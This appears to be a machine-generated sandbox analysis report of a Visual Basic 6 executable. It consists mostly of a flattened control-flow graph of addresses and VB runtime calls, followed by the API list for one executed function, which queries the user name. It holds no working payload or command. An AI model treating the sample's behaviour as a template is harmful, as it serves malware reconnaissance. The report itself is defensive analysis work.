9806 411bb7 9804->9806 9807 411bdf __vbaGenerateBoundsError 9804->9807 9805 4116c8 __vbaFreeStr __vbaFreeVar 9805->9797 9805->9848 9806->9807 9813 411bbd 9806->9813 9810 411be8 __vbaStrCopy 9807->9810 9808 411a01 #593 9808->9800 9814 411a3e #714 __vbaI4Var __vbaFreeVarList 9808->9814 9809 411abc __vbaStrCopy 9812 411b00 __vbaFreeStr 9809->9812 9815 4115d0 9810->9815 9811 4116f8 #631 __vbaStrMove #516 9811->9797 9811->9848 9812->9507 9816 411bd7 9813->9816 9817 411bce __vbaGenerateBoundsError 9813->9817 9814->9822 9818 411c09 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaAryUnlock __vbaAryLock 9815->9818 9816->9810 9817->9816 9820 411c8a __vbaGenerateBoundsError 9818->9820 9821 411c5c 9818->9821 9819 411a87 #537 __vbaStrMove __vbaStrCat __vbaStrMove __vbaFreeStr 9819->9802 9819->9822 9824 411c93 __vbaStrCopy 9820->9824 9821->9820 9823 411c62 9821->9823 9822->9802 9822->9808 9822->9809 9822->9819 9825 411c82 9823->9825 9826 411c76 __vbaGenerateBoundsError 9823->9826 9827 4115d0 9824->9827 9825->9824 9826->9825 9829 411cae __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaAryUnlock __vbaAryLock 9827->9829 9828 41176f __vbaFreeStr __vbaFreeVar 9828->9797 9828->9848 9830 411d24 __vbaGenerateBoundsError 9829->9830 9831 411cf6 9829->9831 9832 411d2d __vbaStrCopy 9830->9832 9831->9830 9834 411cfc 9831->9834 9835 4115d0 9832->9835 9833 4117a0 #631 __vbaStrMove #516 9833->9797 9833->9848 9836 411d10 __vbaGenerateBoundsError 9834->9836 9837 411d1c 9834->9837 9838 411d48 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaAryUnlock __vbaStrCopy 9835->9838 9836->9837 9837->9832 9839 4115d0 9838->9839 9840 411d8b __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy 9839->9840 9841 4115d0 9840->9841 9842 411dbd __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy 9841->9842 9844 4115d0 9842->9844 9843 41180f __vbaFreeStr __vbaFreeVar 9843->9797 9843->9848 9845 411def 8 API calls 9844->9845 9846 4115d0 9845->9846 9847 411e52 8 API calls 9846->9847 9849 411ec8 __vbaAryUnlock __vbaAryUnlock __vbaAryUnlock 9847->9849 9848->9794 9848->9795 9848->9796 9848->9797 9848->9805 9848->9811 9848->9828 9848->9833 9848->9843 9850 41184e #537 __vbaStrMove __vbaStrCat __vbaStrMove __vbaFreeStr 9848->9850 9849->9507 9850->9797 9850->9848 10380 406760 9851->10380 9853 429cee __vbaSetSystemError 9854 429d00 #525 __vbaStrMove __vbaStrToAnsi 9853->9854 9855 429dad __vbaStrCopy 9853->9855 9856 406984 9854->9856 9857 429de5 __vbaFreeStr 9855->9857 9858 429d30 6 API calls 9856->9858 9857->9509 9859 429e05 __vbaErrorOverflow 9858->9859 9860 429d6e #616 __vbaStrMove __vbaStrCat __vbaStrMove __vbaFreeStrList 9858->9860 9860->9857 9862 422bde __vbaErrorOverflow 9861->9862 9863 4229bc 9861->9863 9863->9862 9864 4229c5 9863->9864 9865 4229d9 7 API calls 9864->9865 9872 422b50 __vbaI2I4 __vbaFileClose 9864->9872 9867 4115d0 98 API calls 9865->9867 9869 422a45 __vbaStrMove __vbaStrCopy __vbaStrMove #616 __vbaStrMove 9867->9869 9868 422bb5 __vbaFreeStr __vbaFreeStr 9868->9530 9870 4115d0 98 API calls 9869->9870 9871 422a9b __vbaStrMove __vbaStrCmp __vbaFreeStrList 9870->9871 9871->9872 9873 422adf 9871->9873 9872->9868 9874 4115d0 98 API calls 9873->9874 9875 422aef 6 API calls 9874->9875 9875->9872 10382 406ff4 9876->10382 9878 41e91d 6 API calls 9879 41e9c9 __vbaErrorOverflow 9878->9879 9880 41e968 #616 __vbaStrMove __vbaFreeStr 9878->9880 9881 41e9ab __vbaFreeStr 9880->9881 9881->9620 10384 40703c 9882->10384 9884 41ea6d 6 API calls 9885 41eb19 __vbaErrorOverflow 9884->9885 9886 41eab8 #616 __vbaStrMove __vbaFreeStr 9884->9886 9887 41eafb __vbaFreeStr 9886->9887 9887->9624 9889 42203f __vbaErrorOverflow 9888->9889 9890 4219c4 9888->9890 9890->9889 9891 4219e1 8 API calls 9890->9891 9892 421adf __vbaI2I4 __vbaFileClose 9890->9892 9894 4115d0 98 API calls 9891->9894 9893 421fd1 __vbaFreeStr __vbaFreeStr __vbaFreeStr __vbaFreeStr __vbaFreeStr 9892->9893 9893->9666 9895 421a5b __vbaStrMove 9894->9895 9897 4115d0 98 API calls 9895->9897 9898 421a70 __vbaStrMove __vbaStrCmp __vbaFreeStrList 9897->9898 9899 421ab2 9898->9899 9900 421ac1 __vbaI2I4 __vbaFileClose 9898->9900 9899->9889 9901 421b0e __vbaI2I4 __vbaFileSeek __vbaI2I4 __vbaGet3 9899->9901 9900->9893 9901->9889 9902 421b5c 9901->9902 9902->9889 9903 421b65 __vbaI2I4 __vbaFileSeek 9902->9903 9904 415af0 30 API calls 9903->9904 9905 421b91 6 API calls 9904->9905 9910 421c19 9905->9910 9906 421d16 __vbaI2I4 __vbaFileClose 9907 415af0 30 API calls 9906->9907 9908 421d3d 11 API calls 9907->9908 9913 421e11 9908->9913 9909 421c47 __vbaI2I4 __vbaGet3 __vbaI2I4 __vbaPut3 9909->9889 9909->9910 9910->9889 9910->9906 9910->9909 9912 421cb8 6 API calls 9910->9912 9911 421f1b 11 API calls 9911->9893 9912->9910 9913->9889 9913->9911 9914 421e3f __vbaI2I4 __vbaGet3 __vbaI2I4 __vbaPut3 9913->9914 9915 421f09 #598 9913->9915 9916 421eb0 6 API calls 9913->9916 9914->9889 9914->9913 9915->9913 9916->9915 10386 406a9c 9917->10386 10394 4156d0 __vbaStrToAnsi 9931->10394 9934 415b93 10398 415780 __vbaStrToAnsi 9934->10398 9935 415b5b #580 #529 9937 40b5a3 9935->9937 9940 4259a0 10 API calls 9937->9940 9939 415bae 18 API calls 9939->9937 9941 425a82 9940->9941 9942 426068 __vbaErrorOverflow 9940->9942 9941->9942 9943 425a8b __vbaStrCopy 9941->9943 9944 4115d0 98 API calls 9943->9944 9945 425a9e __vbaStrMove __vbaFreeStr 9944->9945 9946 425c23 __vbaStrCat __vbaStrMove 9945->9946 9947 425abd __vbaLenBstr #525 __vbaStrMove __vbaI2I4 __vbaGet4 9945->9947 9948 425c3d 9946->9948 9949 4115d0 98 API calls 9947->9949 9950 411210 29 API calls 9948->9950 9951 425af2 6 API calls 9949->9951 9952 425c42 __vbaStrMove __vbaFreeStr 9950->9952 9953 425b56 9951->9953 9954 425c07 __vbaStrCat __vbaStrMove 9951->9954 9955 425c52 8 API calls 9952->9955 9956 4115d0 98 API calls 9953->9956 9954->9948 9964 425cbd 9955->9964 9957 425b5f 6 API calls 9956->9957 10404 411210 #594 __vbaFreeVar __vbaLenBstr 9957->10404 9958 425d65 #594 __vbaFreeVar __vbaRedim 9968 425da7 9958->9968 9960 425ba0 __vbaStrMove __vbaFreeStrList 9960->9942 9965 425bcb __vbaI2I4 __vbaGet4 9960->9965 9961 425e51 9972 425e5f __vbaSetSystemError 9961->9972 9974 425e65 9961->9974 9962 425db4 #593 9966 425dfd __vbaGenerateBoundsError 9962->9966 9962->9968 9963 425ce0 __vbaI2I4 __vbaGet3 __vbaI2I4 __vbaPut3 9963->9942 9963->9964 9964->9942 9964->9958 9964->9963 9967 425d28 6 API calls 9964->9967 9973 425be5 9965->9973 9966->9968 9967->9964 9968->9961 9968->9962 9968->9966 9969 425def __vbaGenerateBoundsError 9968->9969 9970 426063 9968->9970 9971 425e1f __vbaFpUI1 __vbaFreeVar 9968->9971 9969->9968 9970->9942 9971->9942 9971->9968 9972->9974 9973->9942 9973->9955 9974->9942 9975 425ed2 9974->9975 9976 425eab __vbaI2I4 __vbaPutOwner3 9974->9976 9975->9942 9977 425ede #593 9975->9977 9976->9942 9976->9974 9977->9970 9978 425f15 __vbaFpI4 __vbaFreeVar 9977->9978 9979 425f3a __vbaRedimPreserve __vbaI2I4 __vbaPutOwner3 9978->9979 9980 425f2f 9978->9980 9979->9942 9981 425f74 9979->9981 9982 425f34 __vbaSetSystemError 9980->9982 9981->9942 9983 425f7d 9 API calls 9981->9983 9982->9979 9984 426020 6 API calls 9983->9984 9984->9575 10413 415830 11 API calls 9985->10413 9987 411f64 __vbaStrMove 9988 4115d0 98 API calls 9987->9988 9989 411f78 __vbaStrMove __vbaFreeStr __vbaLenBstr 9988->9989 9990 411fa1 8 API calls 9989->9990 9991 411fa6 6 API calls 9989->9991 9990->9569 9992 412038 9991->9992 9994 41204f 6 API calls 9992->9994 9995 4120e6 __vbaInStr 9992->9995 9994->9992 9995->9990 9996 412115 9995->9996 9997 4156c6 __vbaErrorOverflow 9996->9997 9998 412128 __vbaInStr 9996->9998 9998->9997 9999 412150 __vbaInStr 9998->9999 9999->9990 10000 412177 9999->10000 10000->9997 10001 4121ad #631 __vbaStrMove __vbaFreeVar __vbaErase __vbaInStr 10000->10001 10001->9990 10002 41223b 10001->10002 10002->9997 10003 41224e __vbaInStr 10002->10003 10003->9990 10103 412275 10003->10103 10004 4146bf __vbaInStr 10004->9990 10005 4146ee 10004->10005 10005->9997 10007 414701 __vbaInStr 10005->10007 10006 4122a8 __vbaRedimPreserve 10006->9997 10006->10103 10007->9990 10008 414728 10007->10008 10008->9997 10011 41475e #631 __vbaStrMove __vbaFreeVar 10008->10011 10009 412316 #631 __vbaStrMove __vbaFreeVar 10009->9997 10010 412356 #616 __vbaStrMove 10009->10010 10010->9997 10012 41237d 7 API calls 10010->10012 10011->9997 10013 41479e #616 __vbaStrMove 10011->10013 10014 41243c __vbaGenerateBoundsError 10012->10014 10021 4123e8 10012->10021 10013->9997 10015 4147c5 7 API calls 10013->10015 10017 412448 __vbaStrCopy 10014->10017 10016 415d20 18 API calls 10015->10016 10019 414841 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy 10016->10019 10415 415d20 6 API calls 10017->10415 10018 412422 __vbaGenerateBoundsError 10018->10021 10022 415d20 18 API calls 10019->10022 10021->10014 10021->10017 10021->10018 10024 414892 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy 10022->10024 10026 415d20 18 API calls 10024->10026 10025 415d20 18 API calls 10027 4124cd __vbaStrMove __vbaBoolStr __vbaFreeStrList 10025->10027 10028 4148e0 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy 10026->10028 10029 412515 __vbaStrCopy 10027->10029 10030 414657 __vbaAryUnlock __vbaInStr 10027->10030 10032 415d20 18 API calls 10028->10032 10033 415d20 18 API calls 10029->10033 10030->9997 10031 4146a5 __vbaInStr 10030->10031 10031->10103 10034 414931 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy 10032->10034 10035 412537 __vbaStrMove __vbaFreeStr __vbaLenBstr 10033->10035 10036 415d20 18 API calls 10034->10036 10035->10103 10037 414982 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy 10036->10037 10039 415d20 18 API calls 10037->10039 10038 41258c __vbaStrCopy 10040 415d20 18 API calls 10038->10040 10041 4149d3 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy 10039->10041 10042 4125ae __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaInStr 10040->10042 10043 415d20 18 API calls 10041->10043 10042->9997 10044 41260d __vbaInStr 10042->10044 10045 414a24 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCmp 10043->10045 10044->10103 10046 414a91 __vbaStrCopy 10045->10046 10047 414a73 __vbaStrCopy 10045->10047 10050 415d20 18 API calls 10046->10050 10047->10046 10048 412d97 __vbaInStr 10048->9997 10049 412dc7 __vbaInStr 10048->10049 10049->10103 10051 414ab3 6 API calls 10050->10051 10054 414d23 __vbaStrCopy __vbaStrCopy __vbaStrCopy __vbaInStr 10051->10054 10055 414b6a 10051->10055 10052 412656 __vbaRedimPreserve 10052->9997 10052->10103 10053 4139f7 __vbaInStr 10053->9997 10059 413a27 __vbaInStr 10053->10059 10056 414e01 10054->10056 10057 415204 __vbaStrCopy __vbaStrCopy __vbaInStr 10054->10057 10055->9997 10058 414b7d __vbaInStr 10055->10058 10056->9997 10061 414e14 __vbaInStr 10056->10061 10064 415445 __vbaStrCopy __vbaInStr 10057->10064 10065 41528c 10057->10065 10058->10054 10062 414ba3 10058->10062 10059->10103 10060 412e10 __vbaRedimPreserve 10060->9997 10060->10103 10061->10057 10067 414e3a 10061->10067 10062->9997 10076 414bd9 #631 __vbaStrMove __vbaFreeVar 10062->10076 10063 4126c3 #631 __vbaStrMove __vbaFreeVar __vbaAryLock 10069 41275e __vbaGenerateBoundsError 10063->10069 10063->10103 10064->9990 10068 4154c6 10064->10068 10065->9997 10066 41529f __vbaInStr 10065->10066 10066->10064 10070 4152c5 10066->10070 10067->9997 10081 414e70 #631 __vbaStrMove __vbaFreeVar 10067->10081 10068->9997 10072 4154d9 __vbaInStr 10068->10072 10071 41276a __vbaErase __vbaStrCopy 10069->10071 10070->9997 10085 4152fb #631 __vbaStrMove __vbaFreeVar 10070->10085 10074 415d20 18 API calls 10071->10074 10072->9990 10077 4154ff 10072->10077 10073 413a70 __vbaRedimPreserve 10073->9997 10073->10103 10079 4127b4 8 API calls 10074->10079 10075 412e7d #631 __vbaStrMove __vbaFreeVar __vbaAryLock 10080 412f18 __vbaGenerateBoundsError 10075->10080 10075->10103 10076->9997 10082 414c19 #616 __vbaStrMove 10076->10082 10077->9997 10089 415535 #631 __vbaStrMove __vbaFreeVar __vbaStrCopy 10077->10089 10078 412744 __vbaGenerateBoundsError 10078->10103 10086 4128a7 __vbaGenerateBoundsError 10079->10086 10148 412862 10079->10148 10084 412f24 __vbaErase __vbaStrCopy 10080->10084 10081->9997 10087 414eb0 #616 __vbaStrMove 10081->10087 10082->9997 10083 414c40 7 API calls 10082->10083 10088 415d20 18 API calls 10083->10088 10090 415d20 18 API calls 10084->10090 10085->9997 10091 41533b #616 __vbaStrMove 10085->10091 10093 4128b3 __vbaI4Str 10086->10093 10087->9997 10095 414ed7 7 API calls 10087->10095 10096 414ca6 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy 10088->10096 10097 415d20 18 API calls 10089->10097 10098 412f6e 8 API calls 10090->10098 10091->9997 10099 415362 7 API calls 10091->10099 10092 413add #631 __vbaStrMove __vbaFreeVar __vbaAryLock 10100 413b78 __vbaGenerateBoundsError 10092->10100 10092->10103 10102 412926 __vbaGenerateBoundsError 10093->10102 10093->10148 10094 412efe __vbaGenerateBoundsError 10094->10103 10104 415d20 18 API calls 10095->10104 10105 415d20 18 API calls 10096->10105 10106 415576 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy 10097->10106 10108 413061 __vbaGenerateBoundsError 10098->10108 10169 41301c 10098->10169 10109 415d20 18 API calls 10099->10109 10110 413b84 __vbaErase __vbaStrCopy 10100->10110 10101 41288d __vbaGenerateBoundsError 10101->10148 10107 412932 __vbaI4Str 10102->10107 10103->9997 10103->10004 10103->10006 10103->10009 10103->10030 10103->10038 10103->10048 10103->10052 10103->10053 10103->10060 10103->10063 10103->10069 10103->10071 10103->10073 10103->10075 10103->10078 10103->10080 10103->10084 10103->10092 10103->10094 10103->10100 10103->10110 10117 413b5e __vbaGenerateBoundsError 10103->10117 10111 414f3d __vbaStrMove __vbaFreeStr __vbaStrCopy 10104->10111 10113 414cf4 __vbaStrMove __vbaStrCopy __vbaFreeStrList 10105->10113 10114 415d20 18 API calls 10106->10114 10115 4129a6 __vbaGenerateBoundsError 10107->10115 10107->10148 10118 41306d __vbaI4Str 10108->10118 10116 4153c8 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy 10109->10116 10119 415d20 18 API calls 10110->10119 10112 415d20 18 API calls 10111->10112 10121 414f73 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy 10112->10121 10113->10054 10122 4155c4 __vbaStrMove __vbaI4Str __vbaFreeStrList 10114->10122 10124 4129b2 __vbaI4Str 10115->10124 10126 415d20 18 API calls 10116->10126 10117->10103 10125 4130e0 __vbaGenerateBoundsError 10118->10125 10118->10169 10127 413bce 8 API calls 10119->10127 10120 41290c __vbaGenerateBoundsError 10120->10148 10130 415d20 18 API calls 10121->10130 10122->9990 10123 413047 __vbaGenerateBoundsError 10123->10169 10133 412a26 __vbaGenerateBoundsError 10124->10133 10124->10148 10129 4130ec __vbaI4Str 10125->10129 10132 415416 __vbaStrMove __vbaStrCopy __vbaFreeStrList 10126->10132 10128 413cc1 __vbaGenerateBoundsError 10127->10128 10143 413c7c 10127->10143 10135 413ccd __vbaI4Str 10128->10135 10138 413160 __vbaGenerateBoundsError 10129->10138 10129->10169 10134 414fc1 __vbaStrMove __vbaI4Str __vbaFreeStrList __vbaStrCopy 10130->10134 10131 41298c __vbaGenerateBoundsError 10131->10148 10132->10064 10137 412a32 __vbaI4Str __vbaErase __vbaStrCopy 10133->10137 10141 415d20 18 API calls 10134->10141 10142 413d40 __vbaGenerateBoundsError 10135->10142 10135->10143 10136 4130c6 __vbaGenerateBoundsError 10136->10169 10140 415d20 18 API calls 10137->10140 10144 41316c __vbaI4Str 10138->10144 10139 413ca7 __vbaGenerateBoundsError 10139->10143 10149 412a86 8 API calls 10140->10149 10146 415011 __vbaStrMove __vbaBoolStr __vbaFreeStrList __vbaStrCopy 10141->10146 10147 413d4c __vbaI4Str 10142->10147 10143->10128 10143->10135 10143->10139 10143->10142 10143->10147 10155 413d26 __vbaGenerateBoundsError 10143->10155 10156 413dc0 __vbaGenerateBoundsError 10143->10156 10160 413dcc __vbaI4Str 10143->10160 10163 413da6 __vbaGenerateBoundsError 10143->10163 10165 413e40 __vbaGenerateBoundsError 10143->10165 10173 413e4c __vbaI4Str __vbaErase __vbaStrCopy 10143->10173 10175 413e26 __vbaGenerateBoundsError 10143->10175 10151 4131e0 __vbaGenerateBoundsError 10144->10151 10144->10169 10145 412a0c __vbaGenerateBoundsError 10145->10148 10154 415d20 18 API calls 10146->10154 10147->10143 10147->10156 10148->10086 10148->10093 10148->10101 10148->10102 10148->10107 10148->10115 10148->10120 10148->10124 10148->10131 10148->10133 10148->10137 10148->10145 10152 412b34 10149->10152 10153 412b79 __vbaGenerateBoundsError 10149->10153 10150 413146 __vbaGenerateBoundsError 10150->10169 10157 4131ec __vbaI4Str __vbaErase __vbaStrCopy 10151->10157 10152->10153 10161 412b85 __vbaI4Str 10152->10161 10166 412b5f __vbaGenerateBoundsError 10152->10166 10168 412bf9 __vbaGenerateBoundsError 10152->10168 10170 412c05 __vbaI4Str 10152->10170 10174 412c79 __vbaGenerateBoundsError 10152->10174 10179 412bdf __vbaGenerateBoundsError 10152->10179 10181 412c85 __vbaI4Str 10152->10181 10185 412c5f __vbaGenerateBoundsError 10152->10185 10186 412cf9 __vbaGenerateBoundsError 10152->10186 10193 412d05 __vbaI4Str 10152->10193 10199 412cdf __vbaGenerateBoundsError 10152->10199 10153->10161 10159 415062 12 API calls 10154->10159 10155->10143 10156->10160 10158 415d20 18 API calls 10157->10158 10164 413240 8 API calls 10158->10164 10167 415d20 18 API calls 10159->10167 10160->10143 10160->10165 10161->10152 10161->10168 10162 4131c6 __vbaGenerateBoundsError 10162->10169 10163->10143 10171 413333 __vbaGenerateBoundsError 10164->10171 10211 4132ee 10164->10211 10165->10173 10166->10152 10172 41514f __vbaStrMove __vbaFreeStr __vbaStrCopy 10167->10172 10168->10170 10169->10108 10169->10118 10169->10123 10169->10125 10169->10129 10169->10136 10169->10138 10169->10144 10169->10150 10169->10151 10169->10157 10169->10162 10170->10152 10170->10174 10176 41333f __vbaI4Str 10171->10176 10177 415d20 18 API calls 10172->10177 10178 415d20 18 API calls 10173->10178 10174->10181 10175->10143 10182 4133b3 __vbaGenerateBoundsError 10176->10182 10176->10211 10183 415185 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy 10177->10183 10184 413ea0 8 API calls 10178->10184 10179->10152 10180 413319 __vbaGenerateBoundsError 10180->10211 10181->10152 10181->10186 10189 4133bf __vbaI4Str 10182->10189 10187 415d20 18 API calls 10183->10187 10188 413f93 __vbaGenerateBoundsError 10184->10188 10222 413f4e 10184->10222 10185->10152 10186->10193 10192 4151d6 __vbaStrMove __vbaI4Str __vbaFreeStrList 10187->10192 10190 413f9f __vbaI4Str 10188->10190 10194 413433 __vbaGenerateBoundsError 10189->10194 10189->10211 10197 414013 __vbaGenerateBoundsError 10190->10197 10190->10222 10191 413399 __vbaGenerateBoundsError 10191->10211 10192->10057 10193->9997 10195 412d37 __vbaInStr 10193->10195 10198 41343f __vbaI4Str 10194->10198 10195->9997 10201 412d5f __vbaInStr __vbaAryUnlock 10195->10201 10196 413f79 __vbaGenerateBoundsError 10196->10222 10200 41401f __vbaI4Str 10197->10200 10203 4134b3 __vbaGenerateBoundsError 10198->10203 10198->10211 10199->10152 10205 414093 __vbaGenerateBoundsError 10200->10205 10200->10222 10201->10103 10202 413419 __vbaGenerateBoundsError 10202->10211 10206 4134bf __vbaI4Str __vbaErase __vbaStrCopy 10203->10206 10204 413ff9 __vbaGenerateBoundsError 10204->10222 10207 41409f __vbaI4Str 10205->10207 10209 415d20 18 API calls 10206->10209 10210 414113 __vbaGenerateBoundsError 10207->10210 10207->10222 10208 413499 __vbaGenerateBoundsError 10208->10211 10213 413513 8 API calls 10209->10213 10216 41411f __vbaI4Str __vbaErase __vbaStrCopy 10210->10216 10211->10171 10211->10176 10211->10180 10211->10182 10211->10189 10211->10191 10211->10194 10211->10198 10211->10202 10211->10203 10211->10206 10211->10208 10212 414079 __vbaGenerateBoundsError 10212->10222 10214 4135c1 10213->10214 10215 413606 __vbaGenerateBoundsError 10213->10215 10214->10215 10218 413612 __vbaI4Str 10214->10218 10220 4135ec __vbaGenerateBoundsError 10214->10220 10221 413686 __vbaGenerateBoundsError 10214->10221 10226 413692 __vbaI4Str 10214->10226 10228 41366c __vbaGenerateBoundsError 10214->10228 10229 413706 __vbaGenerateBoundsError 10214->10229 10231 413712 __vbaI4Str 10214->10231 10234 4136ec __vbaGenerateBoundsError 10214->10234 10235 413786 __vbaGenerateBoundsError 10214->10235 10238 413792 __vbaI4Str __vbaErase __vbaStrCopy 10214->10238 10240 41376c __vbaGenerateBoundsError 10214->10240 10215->10218 10219 415d20 18 API calls 10216->10219 10217 4140f9 __vbaGenerateBoundsError 10217->10222 10218->10214 10218->10221 10223 414173 8 API calls 10219->10223 10220->10214 10221->10226 10222->10188 10222->10190 10222->10196 10222->10197 10222->10200 10222->10204 10222->10205 10222->10207 10222->10210 10222->10212 10222->10216 10222->10217 10224 414221 10223->10224 10225 414266 __vbaGenerateBoundsError 10223->10225 10224->10225 10227 414272 __vbaI4Str 10224->10227 10230 4142e6 __vbaGenerateBoundsError 10224->10230 10232 41424c __vbaGenerateBoundsError 10224->10232 10233 4142f2 __vbaI4Str 10224->10233 10236 4142cc __vbaGenerateBoundsError 10224->10236 10237 414366 __vbaGenerateBoundsError 10224->10237 10239 414372 __vbaI4Str 10224->10239 10242 4143e6 __vbaGenerateBoundsError 10224->10242 10243 41434c __vbaGenerateBoundsError 10224->10243 10245 4143f2 __vbaI4Str __vbaErase __vbaStrCopy 10224->10245 10247 4143cc __vbaGenerateBoundsError 10224->10247 10225->10227 10226->10214 10226->10229 10227->10224 10227->10230 10228->10214 10229->10231 10230->10233 10231->10214 10231->10235 10232->10224 10233->10224 10233->10237 10234->10214 10235->10238 10236->10224 10237->10239 10241 415d20 18 API calls 10238->10241 10239->10224 10239->10242 10240->10214 10244 4137e6 8 API calls 10241->10244 10242->10245 10243->10224 10246 4138d9 __vbaGenerateBoundsError 10244->10246 10259 413894 10244->10259 10249 415d20 18 API calls 10245->10249 10248 4138e5 __vbaI4Str 10246->10248 10247->10224 10251 413959 __vbaGenerateBoundsError 10248->10251 10248->10259 10252 414446 8 API calls 10249->10252 10250 4138bf __vbaGenerateBoundsError 10250->10259 10254 413965 __vbaI4Str 10251->10254 10253 414539 __vbaGenerateBoundsError 10252->10253 10265 4144f4 10252->10265 10255 414545 __vbaI4Str 10253->10255 10254->9997 10257 413997 __vbaInStr 10254->10257 10258 4145b9 __vbaGenerateBoundsError 10255->10258 10255->10265 10256 41393f __vbaGenerateBoundsError 10256->10259 10257->9997 10261 4139bf __vbaInStr __vbaAryUnlock 10257->10261 10262 4145c5 __vbaI4Str 10258->10262 10259->10246 10259->10248 10259->10250 10259->10251 10259->10254 10259->10256 10260 41451f __vbaGenerateBoundsError 10260->10265 10261->10103 10262->9997 10264 4145f7 __vbaInStr 10262->10264 10263 41459f __vbaGenerateBoundsError 10263->10265 10264->9997 10266 41461f __vbaInStr __vbaAryUnlock 10264->10266 10265->10253 10265->10255 10265->10258 10265->10260 10265->10262 10265->10263 10266->10103 10425 40738c 10267->10425 10285 40bf67 10284->10285 10286 415efe 10284->10286 10296 416000 10285->10296 10287 415f15 10286->10287 10290 415f0f __vbaSetSystemError 10286->10290 10288 415f2d 10287->10288 10289 415f1d __vbaNew2 10287->10289 10291 415f43 __vbaHresultCheckObj 10288->10291 10292 415f52 10288->10292 10289->10288 10290->10287 10291->10292 10293 415f6a __vbaHresultCheckObj 10292->10293 10294 415f7c 10292->10294 10293->10294 10295 415f8d __vbaSetSystemError __vbaFreeObj 10294->10295 10295->10285 10297 40bf73 __vbaObjSet 10296->10297 10298 41603e 10296->10298 10297->9732 10299 416056 10298->10299 10300 416046 __vbaNew2 10298->10300 10301 41607b 10299->10301 10302 41606c __vbaHresultCheckObj 10299->10302 10300->10299 10303 416093 __vbaHresultCheckObj 10301->10303 10304 4160a5 10301->10304 10302->10301 10303->10304 10305 4160b6 __vbaSetSystemError __vbaFreeObj 10304->10305 10305->10297 10427 405d3c 10306->10427 10325 405d3c 10324->10325 10326 41a624 __vbaSetSystemError __vbaRecUniToAnsi 10325->10326 10429 405d84 10326->10429 10431 406a10 10344->10431 10381 406769 10380->10381 10383 406ffd 10382->10383 10385 407045 10384->10385 10385->10385 10387 406aa5 10386->10387 10402 406878 10394->10402 10396 415717 __vbaSetSystemError __vbaStrToUnicode __vbaFreeStr 10397 415738 10396->10397 10397->9934 10397->9935 10399 406878 10398->10399 10400 4157c7 __vbaSetSystemError __vbaStrToUnicode __vbaFreeStr 10399->10400 10401 4157e8 10400->10401 10401->9937 10401->9939 10403 406881 10402->10403 10412 4112a3 10404->10412 10405 411546 __vbaStrCopy 10408 4115a4 __vbaFreeStr 10405->10408 10406 4112af #631 __vbaStrMove #516 __vbaFreeStr __vbaFreeVar 10407 4115c9 __vbaErrorOverflow 10406->10407 10406->10412 10408->9960 10409 4113c8 #593 10409->10407 10409->10412 10410 4115c4 10410->10407 10411 411459 17 API calls 10411->10407 10411->10412 10412->10405 10412->10406 10412->10407 10412->10409 10412->10410 10412->10411 10414 415954 __vbaFreeStr 10413->10414 10414->9987 10416 415db3 10415->10416 10417 41247f __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy 10415->10417 10418 415dc3 6 API calls 10416->10418 10419 415eb9 __vbaErrorOverflow 10416->10419 10417->10025 10418->10417 10420 415e0a __vbaLenBstr 10418->10420 10420->10419 10421 415e22 10420->10421 10421->10419 10422 415e39 __vbaLenBstr 10421->10422 10422->10419 10423 415e4e 10422->10423 10423->10419 10424 415e52 #631 __vbaStrMove __vbaFreeVar 10423->10424 10424->10417 10426 407395 10425->10426 10428 405d45 10427->10428 10430 405d8d 10429->10430 10432 406a19 10431->10432 10435 403670 #100 10436 403625 __vbaRaiseEvent 10435->10436 10437 40369a 10435->10437 10436->10435

                                                                                    Executed Functions

                                                                                    Function 0041E9D0 Relevance: 25.6, APIs: 17, Instructions: 78COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • __vbaChkstk.MSVBVM60(00000000,Function_000032B6), ref: 0041E9EE
                                                                                    • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,Function_000032B6), ref: 0041EA1E
                                                                                    • #525.MSVBVM60(000000FF,?,?,?,00000000,Function_000032B6), ref: 0041EA30
                                                                                    • __vbaStrMove.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0041EA3B
                                                                                    • __vbaLenBstr.MSVBVM60(?,?,?,?,00000000,Function_000032B6), ref: 0041EA4C
                                                                                    • __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,00000000,Function_000032B6), ref: 0041EA61
                                                                                    • GetUserNameA.ADVAPI32(00000000), ref: 0041EA6D
                                                                                    • __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,Function_000032B6), ref: 0041EA7B
                                                                                    • __vbaFreeStr.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0041EA84
                                                                                    • #537.MSVBVM60(00000000,?,00000001,?,?,?,00000000,Function_000032B6), ref: 0041EA99
                                                                                    • __vbaStrMove.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0041EAA4
                                                                                    • __vbaInStr.MSVBVM60(00000000,00000000,?,?,?,00000000,Function_000032B6), ref: 0041EAAD
                                                                                    • #616.MSVBVM60(?,-00000001,?,?,?,00000000,Function_000032B6), ref: 0041EABD
                                                                                    • __vbaStrMove.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0041EAC8
                                                                                    • __vbaFreeStr.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0041EAD1
                                                                                    • __vbaFreeStr.MSVBVM60(0041EB05,?,?,?,00000000,Function_000032B6), ref: 0041EAFE
